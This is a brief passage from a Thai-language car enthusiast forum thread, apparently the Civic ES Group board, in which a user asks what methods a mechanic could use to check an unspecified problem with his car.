แล้วถ้าจะให้ช่างเค้าเช็คมันจะมีวิธีไหนบ้างครับ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...